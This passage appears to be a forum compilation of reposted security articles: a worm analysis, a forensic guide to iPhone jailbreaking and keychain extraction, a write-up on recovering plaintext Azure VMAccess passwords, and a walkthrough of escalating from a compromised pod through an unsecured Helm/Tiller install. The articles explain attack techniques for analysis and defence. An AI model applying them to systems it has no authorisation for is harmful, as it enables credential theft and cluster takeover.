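def is_known_sample(path):
    """True if the file at `path` matches the published IOC hash."""
    return sha256_of(path) == IOC_SHA256
```

Hash matching only identifies this exact build; packed variants of the same family will hash differently, which is why the behavioral analysis below matters more than the IOC itself.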
Figure 3 - EternalBlue files from original dump The XML and .fb files are identical to the ones from the original ShadowBrokers leak. Figure 4 - EternalBlue-2.2.0.fb from ShadowBrokers dump Figure 5 - blue.fb from the sample analysis It becomes clear that this sample is intent upon spreading as far as possible. It’s time to look at the network traffic involved to identify what it is doing. NETWORK TRAFFIC Analyzing the network capture with Wireshark, we see a lot of different contacted endpoints: Figure 6 - Extract from the list of IP addresses contacted by the sample The first two servers belong to Microsoft and Akamai and are clean traffic, Windows-related. Then comes the malware traffic itself – one to an IP address in Malaysia, probably command and control (C&C) traffic, the rest targeting consecutive IP addresses in China, part of the worming behavior. Up next, a long list of private IP addresses with little traffic – failed scans since these hosts did not exist in our local network. Note that our sandbox isn’t configured with the 192.168.0.0 network address, so it seems that the sample doesn’t rely solely on the existing interfaces but also on a hard-coded network range to be scanned. The sample scans for an impressive number of open ports on the hosts in both the local network and in the greater Internet. The ports attempted seem to be the same for both types of hosts. Figure 7 - Extract from the ports scanned for one LAN IP Interesting ports that seem to be targeted include SSH, RDP, SMB, HTTP and many others. Figure 8 - Unsuccessful attempts to connect to RDP and SMB on hosts COMMAND AND CONTROL TRAFFIC The sample connects to an IP address in Malaysia for C&C, first sending a login request. Figure 9 - C&C check-in The request comes with a “hash” and a “url” parameter, both of which are hex strings. The “hash” parameter is likely used to identify the host. The “url” parameter is a string that was Base64 encoded and then hex-encoded. 
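The two-layer encoding of the "url" parameter (Base64, then hex) is trivial to reverse. A sketch; the credential string below is hypothetical, not taken from the capture:

```python
import base64
import binascii

def decode_url_param(hexstring):
    """Reverse the sample's 'url' C&C parameter encoding:
    hex-decode, then Base64-decode, yielding the plaintext."""
    return base64.b64decode(binascii.unhexlify(hexstring)).decode()

# A made-up stolen credential, encoded the way the sample does it:
stolen = "Administrator:Passw0rd!"
wire = base64.b64encode(stolen.encode()).hex()
print(decode_url_param(wire))  # Administrator:Passw0rd!
```

The same routine decodes the later check-ins (discovered web servers, page titles), since they use the identical encoding.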
Decoding it reveals that the malware is checking in the Administrator credentials that were stolen using Mimikatz.

Figure 10 - Decoding checked in data – URL parameter

Then comes another request that returns the beginning of an internet IP address range to try to spread to:

Figure 11 - Receiving a target IP range to exploit from C&C

From this point on, the malware starts scanning said network range. It periodically checks in interesting information to the C&C server – for example, after it has identified a server that is up, it checks in the location data – where to find the web server and what the title page is.

Figure 12 - Sending data on discovering network host up

Figure 13 - Decoding URL parameter, letting the C&C server know of discovered web server

Figure 14 - Decoding Title parameter, which sends the page title of the web server response

EXPLOITATION AND POST-EXPLOITATION

The binary attempts different exploit methods depending on open ports. For HTTP, for example, it attempts to access different pages – most to check if a vulnerability exists, but some of them with overt RCE attempts. One such example is an exploit against ThinkPHP that Sucuri previously reported as being used in the wild.

Figure 15 - ThinkPHP Exploit Attempt

There is a minor difference in the payload from what Sucuri reported – this attacker attempts to execute "netstat -an" on the machine to get network info, whereas in the Sucuri report "uname" is used as an RCE test instead. Our honeypots have detected the Sucuri payload every day, so it seems that the attempts come from different attackers targeting the same exploit. Another complete exploit targets the Apache Tomcat platform, CVE-2017-12615. The attacker attempts to upload a snippet of JSP code that they can then execute via a GET request:

Figure 16 - CVE-2017-12615 attempt to upload JSP code to server

The name "satan.jsp" is a good hint of who this malware really is.
In December of 2018, NSFocus blogged about the actors behind Satan ransomware using a self-replicating worm component that would then download ransomware or a cryptocoin miner onto the exploited machines. The reported exploitation methods include a list of web application vulnerabilities that is very similar to the sample at hand – the two ThinkPHP vulnerabilities seem to be the only ones missing from the original report. The behavior they reported also includes SSH bruteforcing, as well as ETERNALBLUE and DOUBLEPULSAR against SMB-capable hosts. It seems that we have identified our threat actor.

Figure 17 - JSP shell code that downloads a binary from a web server depending on platform

The JSP code downloads an executable, fast.exe, from the remote server on Windows platforms, and a bash script on Linux platforms. It then executes the payload. The names involved in the script and JSP shell – "fast.exe", "ft32", "ft64", ".loop" – are similar to what NSFocus reported. As in the NSFocus report, "ft*" and "fast.exe" are simple downloaders for the rest of the modules. "ft" contains a list of C&C servers to contact, in this case all of them in the same network range:

Figure 18 - String view of the "ft32" source code, which shows hints of persistence using Cron as well as C&C IP addresses

Paths to all the different malware components to be downloaded are available – conn32 and conn64, cry32, cry64 and so on. Linux binaries are UPX-compressed and Windows ones use PECompact2. In short, on successful exploitation, the downloader module is installed on the machine; it subsequently tries to contact a C&C server, pull the different components onto the box and then start spreading, encrypting, mining or a combination of these, depending upon the malware author's will. For a more detailed analysis, check out the NSFocus report mentioned above.

RESOLVING THE ETHICAL DILEMMA

The execution of this malware in our sandbox was mostly unrestricted.
As a result, we were able to observe C&C communications and create a good signature. However, this is just what the threat actor desires – people executing his malware to spread it further. As a result, we’ve taken some precautions to limit the maximum amount of damage that sandboxing such samples can do – for example, not using any URLs accessed by these samples for our web crawler since that might lead us to re-executing exploits against innocent websites. Unfortunately, these steps are not perfect as we’ll always have to find balance between how much we allow and limit. CONCLUSION This is an example of the work that goes about when identifying an interesting binary. The work is not limited to simply classifying the malicious behavior but comprises other things as well – identifying ways of detecting the malware via local or network means, correlating information with known sources to validate our research as well as improve the current public knowledge of threat actors and their tools, improving our crawling ability to discover threats as quickly as possible as well as, in this case, making sure that our products are able to use all of this intelligence. Analysis of this binary also revealed a few gaps in our honeypot tracking and exploit traffic simulation capabilities which we are actively working on – deploying honeypot improvements and creating new strikes. BreakingPoint customers already have access to most of the exploits identified during the analysis of this binary – strikes for ETERNALBLUE, Struts S2-045 and S2-047 and other vulnerabilities. ThreatARMOR and visibility customers with an ATI subscription benefit from these detections as well with C&C addresses now being identified and most of the exploits having been tracked by our honeypots for a good amount of time now. 
LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS The Ixia BreakingPoint Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia platforms. Sursa: https://www.ixiacom.com/company/blog/dynamic-analysis-windows-malicious-self-propagating-binary
-
Step by Step Guide to iOS Jailbreaking and Physical Acquisition

May 30th, 2019 by Oleg Afonin

Unless you're using GrayShift or Cellebrite services for iPhone extraction, jailbreaking is a prerequisite for physical acquisition. Physical access offers numerous benefits over other types of extraction; as a result, jailbreaking is in demand among experts and forensic specialists. The procedure of installing a jailbreak for the purpose of physical extraction is vastly different from jailbreaking for research or other purposes. In particular, forensic experts struggle to keep devices offline in order to prevent data leaks, unwanted synchronization and issues with remote device management that may remotely block or erase the device. While there is no lack of jailbreaking guides and manuals for "general" jailbreaking, installing a jailbreak for the purpose of physical acquisition has multiple forensic implications and some important precautions. When performing forensic extraction of an iOS device, we recommend the following procedure.

Prepare the device and perform logical extraction

Enable Airplane mode on the device. This is required in order to isolate the device from wireless networks and cut off Internet connectivity. Verify that the Wi-Fi, Bluetooth and Mobile Data toggles are all switched off. Recent versions of iOS allow keeping (or manually toggling) Wi-Fi and Bluetooth connectivity even after Airplane mode is activated. This allows iOS devices to keep connectivity with the Apple Watch, wireless headphones and other accessories. Since we don't want any of that during the extraction, we'll need to make sure all of these connectivity options are disabled.

Unlock the device. Do not remove the passcode. While you could switch the device into Airplane mode without unlocking the phone, the rest of the process will require the device with its screen unlocked.
While some jailbreaking and acquisition guides (including our own old guides) may recommend you to remove the passcode, don't. Removing the passcode makes iOS erase certain types of data such as Apple Pay transactions, downloaded Exchange mail and some other bits and pieces. Do not remove the passcode.

Pair the device to your computer by establishing trust (note: passcode required!). Since iOS 11, iOS devices require the passcode in order to establish a pairing relationship with the computer. This means that you will require the passcode in order to pair the iPhone to your computer. Without pairing, you won't be able to sideload the jailbreak IPA onto the phone.

Make sure that your computer's Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction. While it is not immediately obvious, we strongly recommend disabling Wi-Fi connectivity on your computer if it has one. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail.

Launch iOS Forensic Toolkit. Make sure that both the iPhone and the license dongle are connected to your computer's USB ports. iOS Forensic Toolkit is available from https://www.elcomsoft.com/eift.html

Using iOS Forensic Toolkit, perform all steps for logical acquisition. iOS Forensic Toolkit supports what is frequently referred to as "Advanced Logical Extraction". During this process, you will make a fresh local backup, obtain device information (hardware, iOS version, list of installed applications), extract crash logs, media files, and shared app data. If the iOS device does not have a backup password, iOS Forensic Toolkit will set a temporary password of '123' in order to allow access to certain types of data (e.g.
messages and keychain items). If a backup password is configured and you don't know it, you may be able to reset the backup password on the device (iOS 11 and 12: the Reset All Settings command; passcode required), then repeat the procedure. However, since the Reset All Settings command also removes the device passcode, you will lose access to Apple Pay transactions and some other data. Refer to "If you have to reset the backup password" for instructions.

Prepare for jailbreaking and install a jailbreak

Identify the hardware and iOS version the device is running (iOS Forensic Toolkit > (I)nformation).

Identify the correct jailbreak supporting the combination of device hardware and software. The following jailbreaks are available for recent versions of iOS:

iOS 12 – 12.1.2: RootlessJB (recommended if compatible with the hardware/iOS version, as the least invasive): https://github.com/jakeajames/rootlessJB
iOS 11.x – 12.1.2: unc0ver jailbreak (source code available): https://github.com/pwn20wndstuff/Undecimus
iOS 12 – 12.1.2: Chimera jailbreak: https://chimera.sh/

Other jailbreaks exist. They may or may not work for the purpose of forensic extraction.

Make sure you have an Apple Account that is registered in the Apple Developer Program (enrollment as a developer carries a yearly fee). Using an Apple Account enrolled in the Apple Developer Program allows sideloading an IPA while the device is offline and without manually approving the signing certificate in the device settings (which requires the device to connect to an Apple server). Note: a "personal" developer account is not sufficient for our purposes; you require a "corporate" developer account instead.

Log in to your developer Apple Account and create an app-specific password. All Apple accounts enrolled in the Apple Developer Program are required to have Two-Factor Authentication. Since Cydia Impactor does not support two-factor authentication, an app-specific password is required to sign and sideload the jailbreak IPA.
Launch Cydia Impactor and sideload the jailbreak IPA using the Apple ID and app-specific password of your Apple developer account. Note: Cydia Impactor will prompt you about which signing certificate to use. Select the developer certificate from the list. Since you have signed the IPA file using your developer account, approving the signing certificate on the iOS device is not required. The iOS device will remain offline.

Launch the jailbreak and follow the instructions. Note: we recommend creating a system snapshot if one is offered by the jailbreak.

Troubleshooting jailbreaks

Modern jailbreaks (targeting iOS 10 and newer) are relatively safe to use since they do not modify the kernel. As a result, a jailbroken device will always boot in a non-jailbroken state; the jailbreak must be reapplied after each reboot. Jailbreaks exploit chains of vulnerabilities in the operating system in order to obtain superuser privileges, escape the sandbox and allow the execution of unsigned applications. Since multiple vulnerabilities are consecutively exploited, the jailbreaking process may fail at any time. It is not unusual for jailbreaking attempts to fail on the first try. If the first attempt fails, you have the following options:

1. Reattempt the jailbreak by re-running the jailbreak app.
2. If this fails, reboot the device, unlock it with the passcode, then wait for about 3 minutes to allow all background processes to start. Then reattempt the jailbreak.

You may need to repeat Step 2 several times for the jailbreak to install. However, if the above procedure does not work after multiple attempts, we recommend trying a different jailbreak tool. For example, we counted no fewer than five different jailbreak tools for iOS 12.0-12.1.2, with some of them offering a higher success rate on certain hardware (and vice versa). Some jailbreaks have specific requirements, such as checking whether an iOS update has been downloaded (and removing the downloaded update if it is there). Do check the accompanying info.
Troubleshooting iOS Forensic Toolkit

If for any reason you have to close and restart iOS Forensic Toolkit, make sure to close the second window as well (the Secure channel window). If iOS Forensic Toolkit appears to be connected to the device but you receive unexpected results, close iOS Forensic Toolkit (both windows) and make sure that your computer is not connected to the Wi-Fi network. If it isn't, try disabling the wired network connection as well, since your computer may be operating on the same network with other iOS devices.

Windows: the Windows version of iOS Forensic Toolkit will attempt to save extracted information to the folder where the tool is installed. While you can specify your own path to store data, it may be easier to move the EIFT installation into a shorter path (e.g. x:\eift\).

Mac: a common mistake is attempting to run iOS Forensic Toolkit directly from the mounted DMG image. Instead, create a local directory and copy EIFT to that location.

If you have to reset the backup password

If the iPhone backup is protected with an unknown password, you may be tempted to quickly reset that password by using the "Reset All Settings" command. We recommend using this option with care, and only after making a full local backup "as is". Resetting "all settings" will also remove the device passcode, which means that iOS will wipe the types of data that rely on passcode protection. This includes Apple Pay transactions, downloaded Exchange messages and some other data. In order to preserve all of that evidence, we recommend the following acquisition sequence:

Perform the complete logical acquisition sequence "as is" with iOS Forensic Toolkit (the backup, media files, crash logs, shared app data).

Jailbreak the device and capture the keychain and file system image. If this is successful, the keychain will contain the backup password.
Reset the backup password: if you are unable to install a jailbreak and perform physical acquisition even after you follow the relevant troubleshooting steps, consider resetting the backup password and following the logical acquisition steps again to capture the backup. Note that if you create the backup with iOS Forensic Toolkit after resetting the password, that backup will be protected with a temporary password of '123'.

Extracting the backup password from the keychain

If you have successfully performed physical acquisition, you already have the decrypted iOS keychain at your disposal. The keychain stores the backup password; you can use that backup password to decrypt the device backup. The backup password is stored in the "BackupAgent" item, as shown on the following screen shot:

On that screen shot, the backup password is "JohnDoe". To discover that password, launch Elcomsoft Phone Breaker and select Explore keychain on the main screen. Click "Browse" > "Choose another" and specify the path to the keychaindump.xml file extracted with iOS Forensic Toolkit. The keychain is always encrypted. The backup password is stored with the ThisDeviceOnly attribute, and can only be extracted via physical acquisition.

Perform physical extraction

Once the device has been jailbroken, it will be possible to extract the content of the file system and to obtain and decrypt the keychain.

Make sure that the iOS device remains in Airplane mode, and that the Wi-Fi, Bluetooth and Mobile Data toggles are disabled.

Make sure that your computer's Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction. While it is not immediately obvious, we strongly recommend disabling Wi-Fi connectivity on your computer if it has one. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail.
Make sure the iOS device has been paired to the computer (or that you have a valid pairing/lockdown file ready).

Unlock the iOS device and make sure its display is switched on. Connect the iOS device to the computer. Note: do not remove the passcode on the device! Otherwise, you will lose access to certain types of evidence such as Apple Pay transactions, downloaded Exchange mail and some other data.

Launch iOS Forensic Toolkit. Use the (D)isable screen lock command from the main window to prevent the iOS device from automatically locking. This is required in order to access some elements of the file system that iOS tries to protect when the device is locked. Preventing screen lock is the simplest way to work around these protection measures.

Extract the keychain: (K)eychain.

Extract the file system image: (F)ile system.

Analyzing the data

As a result of your acquisition efforts, you may have all or some of the following pieces of evidence:

Information about the device (XML) and the list of installed apps (text file). Use any XML or text viewer to analyze.

A local backup in iTunes format. If you have followed the guideline, the backup will be encrypted with a password, and the password is '123'. You can open the backup in any forensic tool that supports iTunes backups, such as Elcomsoft Phone Viewer. In order to analyze the keychain, you'll have to open the backup with Elcomsoft Phone Breaker.

Crash logs. You can analyze these using a text editor. Alternatively, refer to the following work about log file analysis: iOS Sysdiagnose Research (scripts: iOS sysdiagnose forensic scripts).

Media files. Use any gallery or photo viewer app. You may want to use a tool that can extract EXIF information and, particularly, the geotags in order to re-create the suspect's location history. The article iOS Photos.sqlite Forensics is also worth reading!

Shared files. These files can be in any format, most commonly plist, XML or SQLite.

Keychain (extracted with iOS Forensic Toolkit).
Analyze with Elcomsoft Phone Breaker. The keychain contains passwords the user saved in Safari, system and third-party apps. These passwords can be used to sign in to the user’s mail and social network accounts. The passwords can be also used to create a highly targeted custom dictionary for attacking encrypted documents and full disk encryption with tools such as Elcomsoft Distributed Password Recovery. File system image (extracted with iOS Forensic Toolkit). Analyze with Elcomsoft Phone Viewer or unpack the TAR file and analyze manually or using your favorite forensic tool. Sursa: https://blog.elcomsoft.com/2019/05/step-by-step-guide-to-ios-jailbreaking-and-physical-acquisition/
-
March 19, 2018 by Daniel Goldberg and Ofri Ziv

Azure provides an incredible amount of add-on services for its IaaS offerings. These services are provided by the Azure Guest Agent through a large collection of plugins such as Chef integration, a Jenkins interface, a diagnostic channel for apps running inside the machine and many more. While researching the Azure Guest Agent, we've uncovered several security issues which have all been reported to Microsoft. This post will focus on a security design flaw in the VM Access plugin that may enable a cross platform attack impacting every machine type provided by Azure.

Password Harvesting Tool

Simply put, attackers can recover plaintext administrator passwords from machines by abusing the VM Access plugin. These may be reused to access different services, machines and databases. Keeping plaintext credentials can also violate key compliance regulations such as PCI-DSS and others. Microsoft has dismissed this issue and replied as follows: "…the way the agent & extension handlers work is by design." In this post, we'll cover the technical details of how the VM Access plugin works and how we managed to abuse this design flaw to recover "secure" plaintext data. Mitigation for this issue will also be discussed.

The Azure VM Access plugin

One of the many plugins Azure provides is VM Access, a plugin that helps recover access to machines that users have been inadvertently locked out of. This can be the result of mistakes while configuring the machine or because the login credentials have been forgotten. Azure allows users to reset both the machine configuration and the password of any local user. Due to the sensitive nature of credentials handling, we decided to take a closer look at this plugin. Password credentials are a valuable target for attackers, as credential reuse is a constant thorn in many organisations' security posture.
In recent Windows releases, credential storage has been repeatedly hardened, and since Windows 8.1 and Windows Server 2012, Windows hasn't been keeping plaintext passwords at all. Plaintext passwords are even more valuable for attackers, as even minor manipulations on passwords can open multiple doors. We've discovered that since late 2015, attackers have been able to recover plaintext credentials after breaching and taking over an Azure virtual machine, if the VM Access plugin was used at any point on that machine. Let's take a quick look at the Azure Guest Agent and assemble the pieces to understand how the plaintext password can be extracted.

How the Azure Guest Agent works

Azure offers a rich plugin system enabling developers and administrators to interact with virtual machines. The core of this functionality is a cross-platform agent, built into every marketplace virtual machine image. This agent is a background service that continually communicates with a controller (part of the Azure infrastructure), receives tasks to execute, performs them and reports back. At the highest level, the administrator, using the Azure portal or API, provides an operation to be executed on the guest virtual machine. The Azure infrastructure then provides the Guest Agent with the requested configuration and, if required, the plugin to execute it. For example, if the administrator wants to collect specific diagnostics from a machine, Azure provides a plugin package named IaaSDiagnostics and a configuration file with the parameters encoded inside.

Plugin Configuration Files

The communication between the controller and the Guest Agent occurs over plain HTTP with an XML-based protocol. Each configuration is transmitted as a JSON data structure wrapped in XML, and only the raw JSON is stored on disk.
The JSON format is identical across all the extensions and is similar to the following data (taken from a VMAccess configuration, version 2.4.2). This data is saved under:

C:\Packages\Plugins\<PluginName>\RuntimeSettings

This folder is readable by any user but writable only by administrators. For example, the configuration file above was saved as a .settings file under:

C:\Packages\Plugins\Microsoft.Compute.VMAccessAgent\2.4.2\RuntimeSettings\

From our perspective, the important part of this configuration file is the sensitive data (such as passwords), which is encrypted, encoded as a Base64 string and stored in protectedSettings. The sensitive data is encrypted using a certificate generated for communication between the Guest Agent and Azure, given to Azure by the Guest Agent. To read the data encrypted by Azure, the plugin decodes the Base64 data and, using the certificate specified by the thumbprint, decrypts the content. On Windows this certificate is saved in the registry under HKLM\Software\Microsoft\SystemCertificates, accessible only to administrators and the operating system itself.

Recovering Plaintext Data

Now we have all the ingredients needed to recover plaintext data. The new password, provided by the administrator through the Azure portal, is saved in the protectedSettings section of the configuration file that was passed to the Guest Agent running on the guest machine. This file is saved to disk containing the new password as a plaintext string, first encrypted and then Base64 encoded. Once an attacker breaches a machine and successfully escalates privileges, any certificate stored on the machine can be accessed. At that point, all that's required is reading the Base64-encoded data, finding the certificate using the supplied thumbprint and, ta-da, the data is successfully recovered. Here's some simple C# code to decode this data using available Microsoft APIs (code listing in the original post). Compiling this code with a small wrapper will easily recover passwords on Windows.
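The decryption step itself can also be sketched with standard OpenSSL tooling. This is a hypothetical sketch, assuming the protected settings blob is a Base64-encoded CMS/PKCS#7 envelope encrypted to the Guest Agent's certificate, and that the certificate and private key have already been exported; the function name and file arguments are mine, not Azure's:

```shell
#!/bin/bash
# Sketch: decrypt a protectedSettings blob, assuming it is a Base64-encoded
# CMS (PKCS#7) envelope encrypted to the Guest Agent's certificate.
# Arguments: blob file (Base64 text), recipient certificate (PEM), private key (PEM).
decrypt_protected_settings() {
  local blob="$1" cert="$2" key="$3"
  base64 -d "$blob" | openssl cms -decrypt -inform DER -recip "$cert" -inkey "$key"
}
```

On older OpenSSL builds without the cms subcommand, openssl smime -decrypt takes the same role.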
In Linux the vulnerability is the same, and the data can be extracted with a few shell commands running as root.

(Figure: successful execution on a Linux machine)

For an attacker to successfully execute this attack, two conditions are required:

- The VM Access plugin must have been used to reset a user's password.
- A method to read the certificate file using root/administrator permissions.

While privilege escalation may not be trivial, reports about escalation methods are published from time to time. For example, nearly a year ago Microsoft closed a trivial privilege escalation in the Azure Guest Agent on Windows that could give attackers full control of the victim's system. We'll have more on this in our next post.

Bypassing defenses as if they don't exist

A key effort in the past few years has been ensuring that even if attackers compromise a machine, they cannot easily recover passwords or use any stored credentials. This is crucial, as one of the most common methods of propagating across networks is stealing and reusing credentials. Every operating system provides this guarantee in a different fashion, but at bare minimum this consists of storing only password hashes. In addition, storing plain passwords is forbidden by many compliance standards, such as PCI and SWIFT. When it comes to Windows protection, Microsoft has put great effort into hardening credential storage and thwarting credential stealing and other attacks, such as Pass the Hash, weaponised by Mimikatz. Over multiple Windows releases, password storage has been hardened, culminating in Credential Guard, introduced in Windows 10. With the VM Access plugin, none of this hardening is relevant.

Diagnosis and Mitigation

Based on the code provided above, we wrote a diagnostic tool (code available on GitHub, binary available here) to help check which plaintext credentials are stored on an Azure Windows machine.
The tool checks for existing VM Access configuration files and, if any exist, displays the recovered credentials. Run the program inside an Administrator command prompt, as in the following example (figure: result of a successful recovery). If you've ever used the VM Access plugin, we recommend that you consider the password compromised and change it, without using the plugin. If possible, avoid using the VM Access plugin to reset VM passwords. If you still prefer using the plugin, we suggest deleting the configuration files under

C:\Packages\Plugins\Microsoft.Compute.VmAccessAgent\RuntimeSettings

after the plugin has finished running, to minimise the time the passwords are written to disk. A sample PowerShell command could be:

rm -Recurse -Force C:\Packages\Plugins\Microsoft.Compute.VmAccessAgent\2.4.2\RuntimeSettings\*.settings

The equivalent shell command in Linux is:

sudo rm -f /var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config

Summary

Using this design flaw, an attacker can bypass modern security controls quite easily. An attacker with privileged access to a locked-down Windows Server 2016 machine with Credential Guard installed can acquire the plaintext password of an administrator user within a few seconds. This is made possible simply because the password recovery mechanism was used, a mechanism delivered by none other than… Azure. An attacker can then attempt to move laterally across the network through password reuse (a common problem in many organizations) and take over additional services. While this attack requires high privileges, privilege escalation vulnerabilities are routinely discovered. We will show an attack leveraging the Azure Guest Agent in a future post. Lastly, our only reply to Microsoft's claim of "by design" is: why store passwords using reversible encryption in 2018? For more on the implications of the attack and how the Infection Monkey can help, read here.
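The cleanup advice above can be paired with a quick audit for leftover settings files. A minimal sketch (the helper name is mine; the default root matches the Linux waagent directory mentioned above, and the root can be pointed anywhere for testing):

```shell
#!/bin/bash
# Sketch: list leftover extension .settings files under a given root
# (defaults to the Linux waagent directory).
find_leftover_settings() {
  local root="${1:-/var/lib/waagent}"
  find "$root" -type f -name '*.settings' 2>/dev/null
}
```

Run as root, any output means plaintext-recoverable configuration is still on disk and should be deleted.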
Sursa: https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/
-
Attacking default installs of Helm on Kubernetes
28 JANUARY 2019 on pentest, kubernetes, helm, tiller, gke

Table of Contents
- Intro
- tl;dr
- Disclaimer
- Installing the Environment
- Set up GKE
- Installing Helm+Tiller
- Creating the service account
- Initialize Helm
- Installing Wordpress
- Exploiting a Running Pod
- Post Exploitation
- Service Reconnaissance
- Abusing tiller-deploy
- Talking gRPC to Tiller
- Stealing secrets with Helm and Tiller
- Stealing a service account token
- Stealing all secrets from Kubernetes
- Using service account tokens
- Defenses

Intro

I have totally fallen down the Kubernetes rabbit hole and am really enjoying playing with it and attacking it. One thing I've noticed is that although there are a lot of great resources to get up and running with it really quickly, there are far fewer that take the time to make sure it's set up securely. And a lot of these tutorials and quick-start guides leave out important security options for the sake of simplicity. In my opinion, one of the biggest offenders here is Helm, the "package manager for Kubernetes". There are countless tutorials and Stack Overflow answers that completely gloss over the security recommendations and take steps that really put the entire cluster at risk. More and more organizations I've talked to recently actually seem to be ditching the cluster-side install of Helm ("Tiller") entirely for security reasons, and I wanted to explore and explain why. In this post, I'll set up a default GKE cluster with Helm and Tiller, then walk through how an attacker who compromises a running pod could abuse the lack of security controls to completely take over the cluster and become full admin.

tl;dr

The "simple" way to install Helm requires cluster-admin privileges to be given to its pod, and then exposes a gRPC interface inside the cluster without any authentication. This endpoint allows any compromised pod to deploy arbitrary Kubernetes resources and escalate to full admin.
I wrote a few Helm charts that can take advantage of this here: https://github.com/ropnop/pentest_charts

Disclaimer

This post is only meant to practically demonstrate the risks involved in not enabling the security features for Helm. These are not vulnerabilities in Helm or Tiller, and I'm not disclosing anything previously unknown. My only hope is that by laying out practical attacks, people will think twice about configuring loose RBAC policies and not enabling mTLS for Tiller.

Installing the Environment

To demonstrate the attack, I'm going to set up a typical web stack on Kubernetes using Google Kubernetes Engine (GKE) and Helm. I'll be installing everything using just the defaults as found in many write-ups on the internet. If you want to just get to the attacking part, feel free to skip this section and go directly to "Exploiting a Running Pod".

Set up GKE

I've created a new GCP project and will be using the command line tool to spin up a new GKE cluster and gain access to it:

$ gcloud projects create ropnop-helm-testing # create a new project
$ gcloud config set project ropnop-helm-testing # use the new project
$ gcloud config set compute/region us-central1
$ gcloud config set compute/zone us-central1-c
$ gcloud services enable container.googleapis.com # enable Kubernetes APIs

Now I'm ready to create the cluster and get credentials for it. I will do it with all the default options. There are a lot of command line switches that can help lock down this cluster, but I'm not going to provide any:

$ gcloud container clusters create ropnop-k8s-cluster

After a few minutes, my cluster is up and running. Lastly, I get credentials and verify connectivity with kubectl:

$ gcloud container clusters get-credentials ropnop-k8s-cluster # set up kubeconfig
$ kubectl config get-clusters

And everything looks good. Time to install Helm and Tiller.

Installing Helm+Tiller

Helm has a quickstart guide to getting up and running with Helm quickly.
This guide does mention that the default installation is not secure and should only be used for non-production or internal clusters. However, several other guides on the internet skip over this fact (example1, example2), and several Stack Overflow answers I've seen just have copy/paste code to install Tiller with no mention of security. Again, I'll be doing a default installation of Helm and Tiller, using the "easiest" method.

Creating the service account

Since Role Based Access Control (RBAC) is now enabled by default on every Kubernetes provider, the original way of using Helm and Tiller doesn't work: the Tiller pod needs elevated permissions to talk to the Kubernetes API. Fine-grained control of service account permissions is tricky and often overlooked, so the "easiest" way to get up and running is to create a service account for Tiller with full cluster admin privileges. To create such a service account, I define a new ServiceAccount and ClusterRoleBinding in YAML:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: tiller
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: tiller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: tiller
  namespace: kube-system

and apply it with kubectl:

$ kubectl apply -f tiller-rbac.yaml

This created a service account called tiller, generated a secret auth token for it, and gave the account full cluster admin privileges.

Initialize Helm

The final step is to initialize Helm with the new service account. Again, there are additional flags that can be provided to this command to help lock it down, but I'm just going with the "defaults":

$ helm init --service-account tiller

Besides setting up our client, this command also creates a deployment and service in the kube-system namespace for Tiller.
The resources are tagged with the label app=helm, so you can filter and see everything running. We can also see that the Tiller deployment is configured to use our cluster admin service account:

$ kubectl -n kube-system get deployments -l 'app=helm' -o jsonpath='{.items[0].spec.template.spec.serviceAccount}'
tiller

Installing Wordpress

Now it's time to use Helm to install something. For this scenario, I'll be installing a Wordpress stack from the official Helm repository. This is a pretty good example of how quick and powerful Helm can be: in one command we can get a full stack deployment of Wordpress, including a persistent MySQL backend.

$ helm install stable/wordpress --name mycoolblog

With no other flags, Tiller deploys all the resources into the default namespace. The "name" field gets applied as a release label on the resources, so we can view everything that was created. Helm took care of exposing the port for us too, via a LoadBalancer service, so if we visit the external IP listed, we can see that Wordpress is indeed up and running. And that's it! I've got my blog up and running on Kubernetes in no time. What could go wrong now?

Exploiting a Running Pod

From here on out, I am going to assume that my Wordpress site has been totally compromised and an attacker has gained remote code execution on the underlying pod. This could be through a vulnerable plugin I installed or a bad misconfiguration, but let's just assume an attacker got a shell.

Note: for purposes of this scenario I'm just giving myself a shell on the pod directly with the following command:

$ kubectl exec -it mycoolblog-wordpress-5d6c7d5464-hl972 -- /bin/bash

Post Exploitation

After landing a shell, there are a few indicators that quickly point to this being a container running on Kubernetes:

- The file /.dockerenv exists - we're inside a Docker container
- Various Kubernetes environment variables

There are several good resources out there for various Kubernetes post-exploitation activities.
I recommend carnal0wnage's Kubernetes master post for a great round-up. Trying some of these techniques, though, we'll discover that the default GKE install is still fairly locked down (and updated against recent CVEs). Even though we can talk to the Kubernetes API, for example, RBAC is enabled and we can't get anything from it. Time for some more reconnaissance.

Service Reconnaissance

By default, Kubernetes makes service discovery within a cluster easy through kube-dns. Looking at /etc/resolv.conf, we can see that this pod is configured to use kube-dns:

nameserver 10.7.240.10
search default.svc.cluster.local svc.cluster.local cluster.local us-central1-c.c.ropnop-helm-testing.internal c.ropnop-helm-testing.internal google.internal
options ndots:5

Our search domains tell us we're in the default namespace (as well as inside a GKE project named ropnop-helm-testing). DNS names in kube-dns follow the format <svc_name>.<namespace>.svc.cluster.local. Through DNS, for example, we can look up our MariaDB service that Helm created:

$ getent hosts mycoolblog-mariadb
10.7.242.104 mycoolblog-mariadb.default.svc.cluster.local

(Note: I'm using getent since this pod didn't have standard DNS tools installed - living off the land ftw)

Even though we're in the default namespace, it's important to remember that namespaces don't provide any security. By default, there are no network policies that prevent cross-namespace communication. From this position, we can query services that are running in the kube-system namespace. For example, the kube-dns service itself:

$ getent hosts kube-dns.kube-system.svc.cluster.local
10.7.240.10 kube-dns.kube-system.svc.cluster.local

Through DNS, it's possible to enumerate running services in other namespaces. Remember how Tiller created a service in kube-system? Its default name is 'tiller-deploy'. If we check for that via a DNS lookup, we see it exists and exactly where it's at. Great! Tiller is installed in this cluster. How can we abuse it?
